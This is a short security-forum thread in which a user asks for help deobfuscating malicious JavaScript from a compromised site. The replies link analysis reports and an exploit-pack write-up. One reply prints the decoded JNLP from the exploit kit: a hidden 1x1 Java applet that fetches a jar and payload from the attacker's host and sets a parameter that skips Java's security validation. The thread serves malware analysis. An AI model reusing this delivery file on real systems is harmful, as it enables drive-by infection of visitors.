[skeptre]

Hi,

I obtained a javascript from the following link:
hxxp://mp3rs.com/mp3rs.com/admin/skin_cp/images/72f11cda78/?=MDct5ibpFWbf12c8ZTN1ADN3YTM0ETO0EDN89CO3EGZjFTMmJzNvMXZnFWbp9Ccj9lbpt2cv4WatRWYv02bj5ycyNDct9SbvNmLzJ3Mw12LvoDc0RHa8NnZ

I appreciate any hints about trying to understand how to de-obfuscate it, attaching the same.
I tried debugging with firefox firebug and a JS interpreter but could not complete the whole de-obfuscation.

[erank]

this might help...

http://wepawet.iseclab.org/view.php?has ... 1382689236

[Xylitol]

Code: Select all

<?xml version='1.0' encoding='utf-8'?>
<jnlp spec='1.0' xmlns:jfx='http://javafx.com' href='app.jnlp'>
<information>
<title>Applet Test JNLP</title>
<vendor>atom</vendor>
<description>atom</description>
<offline-allowed/>
</information>

<resources>
<j2se version='1.7+' href='http://java.sun.com/products/autodl/j2se' />
<jar href='http://mp3rs.com/mp3rs.com/admin/skin_cp/images/72f11cda78/?f=a&k=4149141674055630' main='true' />
</resources>
<applet-desc name='atom' main-class='Auto' width='1' height='1'>
<param name='__applet_ssv_validated' value='true'></param>
<param name='url' value='http://mp3rs.com/mp3rs.com/admin/skin_cp/images/72f11cda78/?f=sm_main.mp3&k=4149141674055641'></param>
</applet-desc>
<update check='background'/>
</jnlp>

http://urlquery.net/report.php?id=7868909
http://urlquery.net/report.php?id=7868910
http://urlquery.net/report.php?id=7868912

[forty-six]

give a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime

http://www.kahusecurity.com/2013/analyz ... loit-pack/